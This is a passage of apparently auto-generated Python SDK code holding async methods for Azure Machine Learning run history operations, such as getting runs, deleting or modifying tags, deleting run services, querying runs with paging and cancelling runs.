template_url=self.add.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
add.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def get(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
**kwargs: Any
) -> "_models.Run":
"""get.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def delete_tags_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
body: Optional[List[str]] = None,
**kwargs: Any
) -> "_models.Run":
"""delete_tags_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:param body:
:type body: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, '[str]')
else:
_json = None
request = build_delete_tags_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.delete_tags_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_tags_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/tags'} # type: ignore
@distributed_trace_async
async def modify_or_delete_tags_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
body: Optional["_models.DeleteOrModifyTags"] = None,
**kwargs: Any
) -> "_models.Run":
"""modify_or_delete_tags_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.DeleteOrModifyTags
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteOrModifyTags')
else:
_json = None
request = build_modify_or_delete_tags_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.modify_or_delete_tags_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
modify_or_delete_tags_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/tags'} # type: ignore
@distributed_trace_async
async def delete_tags_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
body: Optional[List[str]] = None,
**kwargs: Any
) -> "_models.Run":
"""delete_tags_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:param body:
:type body: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, '[str]')
else:
_json = None
request = build_delete_tags_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.delete_tags_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_tags_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/tags'} # type: ignore
@distributed_trace_async
async def modify_or_delete_tags_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
body: Optional["_models.DeleteOrModifyTags"] = None,
**kwargs: Any
) -> "_models.Run":
"""modify_or_delete_tags_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.DeleteOrModifyTags
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteOrModifyTags')
else:
_json = None
request = build_modify_or_delete_tags_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.modify_or_delete_tags_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
modify_or_delete_tags_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/tags'} # type: ignore
@distributed_trace_async
async def delete_tags(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
body: Optional[List[str]] = None,
**kwargs: Any
) -> "_models.Run":
"""delete_tags.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param body:
:type body: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, '[str]')
else:
_json = None
request = build_delete_tags_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
content_type=content_type,
json=_json,
template_url=self.delete_tags.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_tags.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}/tags'} # type: ignore
@distributed_trace_async
async def delete_run_services_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
body: Optional["_models.DeleteRunServices"] = None,
**kwargs: Any
) -> "_models.Run":
"""delete_run_services_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.DeleteRunServices
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteRunServices')
else:
_json = None
request = build_delete_run_services_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.delete_run_services_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_run_services_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/services'} # type: ignore
@distributed_trace_async
async def delete_run_services_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
body: Optional["_models.DeleteRunServices"] = None,
**kwargs: Any
) -> "_models.Run":
"""delete_run_services_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.DeleteRunServices
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteRunServices')
else:
_json = None
request = build_delete_run_services_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.delete_run_services_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_run_services_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/services'} # type: ignore
@distributed_trace_async
async def delete_run_services(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
body: Optional["_models.DeleteRunServices"] = None,
**kwargs: Any
) -> "_models.Run":
"""delete_run_services.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.DeleteRunServices
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'DeleteRunServices')
else:
_json = None
request = build_delete_run_services_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
content_type=content_type,
json=_json,
template_url=self.delete_run_services.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_run_services.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}/services'} # type: ignore
@distributed_trace
def get_by_query_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_name: str,
body: Optional["_models.QueryParams"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PaginatedRunList"]:
"""get_by_query_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param experiment_name:
:type experiment_name: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.QueryParams
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
if body is not None:
_json = self._serialize.body(body, 'QueryParams')
else:
_json = None
request = build_get_by_query_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.get_by_query_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
if body is not None:
_json = self._serialize.body(body, 'QueryParams')
else:
_json = None
request = build_get_by_query_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_by_query_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs:query'} # type: ignore
@distributed_trace
def get_by_query_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_id: str,
body: Optional["_models.QueryParams"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PaginatedRunList"]:
"""get_by_query_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param experiment_id:
:type experiment_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.QueryParams
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
if body is not None:
_json = self._serialize.body(body, 'QueryParams')
else:
_json = None
request = build_get_by_query_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.get_by_query_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
if body is not None:
_json = self._serialize.body(body, 'QueryParams')
else:
_json = None
request = build_get_by_query_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_by_query_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs:query'} # type: ignore
@distributed_trace_async
async def get_by_ids_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_id: str,
body: Optional["_models.GetRunsByIds"] = None,
**kwargs: Any
) -> "_models.BatchRunResult":
"""get_by_ids_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param experiment_id:
:type experiment_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.GetRunsByIds
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchRunResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchRunResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchRunResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'GetRunsByIds')
else:
_json = None
request = build_get_by_ids_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.get_by_ids_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('BatchRunResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_ids_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/runIds'} # type: ignore
@distributed_trace_async
async def get_by_ids_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_name: str,
body: Optional["_models.GetRunsByIds"] = None,
**kwargs: Any
) -> "_models.BatchRunResult":
"""get_by_ids_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param experiment_name:
:type experiment_name: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.GetRunsByIds
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchRunResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchRunResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchRunResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'GetRunsByIds')
else:
_json = None
request = build_get_by_ids_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.get_by_ids_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('BatchRunResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_ids_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/runIds'} # type: ignore
@distributed_trace_async
async def cancel_run_with_uri_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
cancelation_reason: Optional[str] = None,
**kwargs: Any
) -> "_models.Run":
"""cancel_run_with_uri_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:param cancelation_reason:
:type cancelation_reason: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_cancel_run_with_uri_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
cancelation_reason=cancelation_reason,
template_url=self.cancel_run_with_uri_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
